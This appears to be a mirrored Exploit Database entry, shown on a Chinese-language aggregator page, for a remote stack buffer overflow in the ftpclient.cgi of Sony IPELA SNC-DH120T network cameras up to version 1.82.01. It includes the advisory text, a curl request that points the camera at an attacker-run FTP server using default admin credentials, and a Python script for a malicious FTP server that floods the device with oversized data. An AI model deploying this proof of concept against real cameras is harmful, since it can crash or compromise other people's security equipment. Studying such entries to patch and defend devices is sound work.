Sony IPELA Network Camera 1.82.01 – ‘ftpclient.cgi’ Remote Stack Buffer Overflow

• Exploit Database
• 114 阅读

• 作者： LiquidWorm
  日期： 2020-10-01
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/48842/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92

  # Exploit Title: Sony IPELA Network Camera 1.82.01 - &apos;ftpclient.cgi&apos; Remote Stack Buffer Overflow # Google Dork: Server: Mida eFramework # Date: 2020-09-30 # Exploit Author: LiquidWorm # Vendor Homepage: https://pro.sony # Version: <= 1.82.01   #!/usr/bin/env python # # # Sony IPELA Network Camera (ftpclient.cgi) Remote Stack Buffer Overflow # # # Vendor: Sony Electronics Inc. # Product web page: https://pro.sony # Affected version: SNC-DH120T v1.82.01 # # # Summary: IPELA is Sony&apos;s vision of the ultimate workplace, designed to revolutionize # the way business communicates over global IP networks. IPELA products can improve the # efficiency of your organization by connecting people and places with high-quality audio # and video. The SNC-DH120T is an indoor tamper proof, high definition (720p) minidome # network security camera with Electronic Day/Night settings, DEPA analysis and is ONVIF # compliant. It supports dual streaming of H.264, MPEG-4 and JPEG at full frame-rate. # # Desc: The vulnerability is caused due to a boundary error in the processing of received # FTP traffic through the FTP client functionality (ftpclient.cgi), which can be exploited # to cause a stack-based buffer overflow when a user issues a POST request to connect to a # malicious FTP server. Successful exploitation could allow execution of arbitrary code on # the affected device or cause denial of service scenario. # # Tested on: gen5th/1.x # # # Vulnerability discovered by Gjoko &apos;LiquidWorm&apos; Krstic # @zeroscience # # # Advisory ID: ZSL-2020-5596 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5596.php # Fixed in 1.88.0.0: https://pro.sony/en_NL/support-resources/snc-dh120/software/mpengb00000928 # # # 28.10.2019 #     # PoC:   # Trigger: # curl &apos;http://10.0.0.3:5080/command/ftpclient.cgi&apos; \ # -H &apos;Connection: keep-alive&apos; \ # -H &apos;Cache-Control: max-age=0&apos; \ # -H &apos;Authorization: Basic YWRtaW46YWRtaW4=&apos; \ # -H &apos;Upgrade-Insecure-Requests: 1&apos; \ # -H &apos;Origin: http://10.0.0.3:5080&apos; \ # -H &apos;Content-Type: application/x-www-form-urlencoded&apos; \ # -H &apos;User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36&apos; \ # -H &apos;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9&apos; \ # -H &apos;Referer: http://81.83.17.200:5080/en/l4/ftp/common.html&apos; \ # -H &apos;Accept-Language: en-GB,en-US;q=0.9,en;q=0.8&apos; \ # --data &apos;FtpClientFunc=on&FcServerName=10.0.0.5&FcUserName=EVIL&FcPassword=NONESO&FcPassive=off&reload=referer&apos; \ # --compressed \ # --insecure # #   # Observed fixed version log: # 2020-07-27 17:48:03 FTP client Unexpected error occurred during FTP client operation. #     import socket   HOST = &apos;127.0.0.1&apos; # 10.0.0.5 PORT = 21   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((HOST, PORT)) s.listen(1) conn, addr = s.accept() print &apos;Connection from&apos;, addr while True: data = conn.recv(1024) if not data: break evil= "A" * 100000 evil += "B" * 10000 evil += "C" * 1000 conn.sendall(evil+&apos;\n&apos;) s.close()